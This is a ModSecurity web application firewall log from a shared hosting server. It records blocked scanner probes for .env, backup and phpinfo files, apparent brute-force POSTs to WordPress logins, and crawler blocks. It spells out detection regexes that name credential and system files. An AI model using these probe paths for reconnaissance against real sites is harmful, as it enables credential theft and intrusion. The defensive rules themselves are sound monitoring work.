[Tue May 26 14:45:55.622352 2026] [security2:error] [pid 636820:tid 636983] [client 195.178.110.34:58556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/awstats/.env"] [unique_id "ahVky6_r6oOphPch7B-bvwAAACE"]
[Tue May 26 14:45:55.653778 2026] [security2:error] [pid 636820:tid 637054] [client 65.111.27.128:61461] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkyq_r6oOphPch7B-boAAAAGg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:56.634184 2026] [security2:error] [pid 636820:tid 636962] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkzK_r6oOphPch7B-bygAAAAw"]
[Tue May 26 14:45:57.630938 2026] [security2:error] [pid 636820:tid 637045] [client 14.191.157.222:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkza_r6oOphPch7B-b4wAAAF8"]
[Tue May 26 14:45:58.050423 2026] [security2:error] [pid 636820:tid 636975] [client 216.26.245.175:23559] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkzK_r6oOphPch7B-b2AAAABk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:45:58.808946 2026] [security2:error] [pid 636820:tid 637034] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkzq_r6oOphPch7B-cCQAAAFQ"]
[Tue May 26 14:45:59.363005 2026] [security2:error] [pid 636820:tid 636991] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/awstats/.env"] [unique_id "ahVkz6_r6oOphPch7B-cJwAAACk"]
[Tue May 26 14:45:59.520796 2026] [security2:error] [pid 636820:tid 637072] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/conf/.env"] [unique_id "ahVkz6_r6oOphPch7B-cLAAAAHo"]
[Tue May 26 14:45:59.714733 2026] [security2:error] [pid 636820:tid 637076] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/cron/.env"] [unique_id "ahVkz6_r6oOphPch7B-cNgAAAH4"]
[Tue May 26 14:45:59.899064 2026] [security2:error] [pid 636820:tid 637036] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/www/.env"] [unique_id "ahVkz6_r6oOphPch7B-cPAAAAFY"]
[Tue May 26 14:46:00.093123 2026] [security2:error] [pid 636820:tid 637022] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/docker/.env"] [unique_id "ahVk0K_r6oOphPch7B-cSQAAAEg"]
[Tue May 26 14:46:00.305435 2026] [security2:error] [pid 636820:tid 636976] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/docker/app/.env"] [unique_id "ahVk0K_r6oOphPch7B-cUQAAABo"]
[Tue May 26 14:46:00.355900 2026] [security2:error] [pid 636820:tid 637012] [client 209.50.171.227:39185] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVkz6_r6oOphPch7B-cJQAAAD4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:00.535979 2026] [security2:error] [pid 636820:tid 637024] [client 195.178.110.34:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/env.backup"] [unique_id "ahVk0K_r6oOphPch7B-cVAAAAEo"]
[Tue May 26 14:46:00.734547 2026] [security2:error] [pid 636820:tid 636987] [client 195.178.110.34:58560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/xampp/phpinfo.php"] [unique_id "ahVk0K_r6oOphPch7B-cYAAAACU"]
[Tue May 26 14:46:00.753253 2026] [security2:error] [pid 636820:tid 636950] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk0K_r6oOphPch7B-cUgAAAAA"]
[Tue May 26 14:46:00.917889 2026] [security2:error] [pid 636820:tid 636968] [client 64.233.173.131:58235] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVk0K_r6oOphPch7B-cTwAAABI"]
[Tue May 26 14:46:00.919000 2026] [security2:error] [pid 636820:tid 637050] [client 64.233.173.133:47959] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVkz6_r6oOphPch7B-cIQAAAGQ"]
[Tue May 26 14:46:01.108310 2026] [security2:error] [pid 636820:tid 637043] [client 195.178.110.34:58576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/lara/info.php"] [unique_id "ahVk0a_r6oOphPch7B-caAAAAF0"]
[Tue May 26 14:46:01.457429 2026] [security2:error] [pid 636820:tid 637070] [client 195.178.110.34:58580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/lara/phpinfo.php"] [unique_id "ahVk0a_r6oOphPch7B-cdAAAAHg"]
[Tue May 26 14:46:01.771244 2026] [security2:error] [pid 636820:tid 637075] [client 195.178.110.34:58588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/laravel/info.php"] [unique_id "ahVk0a_r6oOphPch7B-cfgAAAH0"]
[Tue May 26 14:46:02.088707 2026] [security2:error] [pid 636820:tid 637012] [client 195.178.110.34:58604] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.vscode/.env"] [unique_id "ahVk0q_r6oOphPch7B-cggAAAD4"]
[Tue May 26 14:46:02.549336 2026] [security2:error] [pid 636820:tid 637055] [client 104.207.37.145:11761] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk0a_r6oOphPch7B-ccgAAAGk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:02.756465 2026] [security2:error] [pid 636820:tid 636956] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk0q_r6oOphPch7B-ciAAAAAY"]
[Tue May 26 14:46:03.354574 2026] [security2:error] [pid 636820:tid 637067] [client 114.119.156.185:39741] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/showshoe"] [unique_id "ahVk06_r6oOphPch7B-cqQAAAHU"], referer: http://rohiniventures.com/blog/category/showshoe
[Tue May 26 14:46:04.332523 2026] [security2:error] [pid 636820:tid 636979] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk06_r6oOphPch7B-cuQAAAB0"]
[Tue May 26 14:46:04.370057 2026] [security2:error] [pid 636820:tid 637059] [client 130.12.182.60:33580] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVk06_r6oOphPch7B-cvQAAAG0"], referer: https://anujtradingco.com/wp-admin/
[Tue May 26 14:46:04.829281 2026] [security2:error] [pid 636820:tid 637061] [client 209.50.189.143:16299] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk06_r6oOphPch7B-crQAAAG8"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:05.888188 2026] [security2:error] [pid 636820:tid 637028] [client 216.26.234.236:40651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.234.26.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk1a_r6oOphPch7B-c6wAAAE4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:06.614892 2026] [security2:error] [pid 636820:tid 637065] [client 195.178.110.34:53292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/js/.env"] [unique_id "ahVk1q_r6oOphPch7B-c_wAAAHM"]
[Tue May 26 14:46:06.819875 2026] [security2:error] [pid 636820:tid 637001] [client 20.104.227.76:23986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "facebookverification.net.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVk1q_r6oOphPch7B-dCgAAADM"]
[Tue May 26 14:46:07.399749 2026] [security2:error] [pid 636820:tid 637052] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk1q_r6oOphPch7B-dEAAAAGY"]
[Tue May 26 14:46:08.221169 2026] [security2:error] [pid 636820:tid 636974] [client 65.111.12.182:13617] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk16_r6oOphPch7B-dFwAAABg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:08.682868 2026] [security2:error] [pid 636820:tid 636973] [client 216.244.66.241:43272] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item/cl010301torquconverteroil.php"] [unique_id "ahVk2K_r6oOphPch7B-dRQAAABc"]
[Tue May 26 14:46:08.682989 2026] [security2:error] [pid 636820:tid 636973] [client 216.244.66.241:43272] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item/cl010301torquconverteroil.php"] [unique_id "ahVk2K_r6oOphPch7B-dRQAAABc"]
[Tue May 26 14:46:08.754837 2026] [security2:error] [pid 636820:tid 636992] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk2K_r6oOphPch7B-dOAAAACo"]
[Tue May 26 14:46:10.174775 2026] [security2:error] [pid 636820:tid 636952] [client 20.12.190.196:55173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVk2q_r6oOphPch7B-dgwAAAAI"]
[Tue May 26 14:46:10.174882 2026] [security2:error] [pid 636820:tid 636952] [client 20.12.190.196:55173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVk2q_r6oOphPch7B-dgwAAAAI"]
[Tue May 26 14:46:10.261813 2026] [security2:error] [pid 636820:tid 637053] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk2a_r6oOphPch7B-ddQAAAGc"]
[Tue May 26 14:46:10.416140 2026] [security2:error] [pid 636820:tid 637030] [client 45.3.41.26:11467] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk2a_r6oOphPch7B-dYAAAAFA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:11.327938 2026] [security2:error] [pid 636820:tid 636980] [client 20.12.190.196:55257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVk26_r6oOphPch7B-dpQAAAB4"]
[Tue May 26 14:46:11.328048 2026] [security2:error] [pid 636820:tid 636980] [client 20.12.190.196:55257] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVk26_r6oOphPch7B-dpQAAAB4"]
[Tue May 26 14:46:12.674854 2026] [security2:error] [pid 636820:tid 636978] [client 216.26.240.128:44947] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk26_r6oOphPch7B-drAAAABw"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:12.754450 2026] [security2:error] [pid 636820:tid 636944] [remote 203.172.89.21:38506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.89.172.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVk3K_r6oOphPch7B-dygAAKHs"]
[Tue May 26 14:46:12.898500 2026] [security2:error] [pid 636820:tid 637055] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk3K_r6oOphPch7B-dyQAAAGk"]
[Tue May 26 14:46:13.489984 2026] [security2:error] [pid 636820:tid 636994] [client 20.104.227.76:23982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "facebookverification.net.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVk3a_r6oOphPch7B-d6AAAACw"]
[Tue May 26 14:46:13.492797 2026] [security2:error] [pid 636820:tid 636960] [client 195.178.110.34:37228] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/js/.env"] [unique_id "ahVk3a_r6oOphPch7B-d6QAAAAo"]
[Tue May 26 14:46:14.825316 2026] [security2:error] [pid 636820:tid 637043] [client 45.3.43.21:37931] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk3a_r6oOphPch7B-d7wAAAF0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:15.262150 2026] [security2:error] [pid 636820:tid 637067] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk3q_r6oOphPch7B-eBwAAAHU"]
[Tue May 26 14:46:16.147821 2026] [security2:error] [pid 636820:tid 637052] [client 65.111.28.105:39311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.28.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk36_r6oOphPch7B-eHgAAAGY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:16.951249 2026] [security2:error] [pid 636820:tid 637029] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVk4K_r6oOphPch7B-eMAAAAE8"]
[Tue May 26 14:46:17.926946 2026] [security2:error] [pid 636820:tid 636969] [client 185.191.171.16:19012] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVk4a_r6oOphPch7B-eYQAAABM"]
[Tue May 26 14:46:17.927087 2026] [security2:error] [pid 636820:tid 636969] [client 185.191.171.16:19012] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/page/2/"] [unique_id "ahVk4a_r6oOphPch7B-eYQAAABM"]
[Tue May 26 14:46:18.297783 2026] [security2:error] [pid 636820:tid 636830] [remote 45.148.10.95:54668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.kingsclubmembership.com"] [uri "/*update.cgi*"] [unique_id "ahVk4q_r6oOphPch7B-ebgAAegk"]
[Tue May 26 14:46:18.373584 2026] [security2:error] [pid 636820:tid 637024] [client 45.3.38.80:30809] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVk4a_r6oOphPch7B-eTwAAAEo"], referer: https://velanstore.ca/wp-login.php
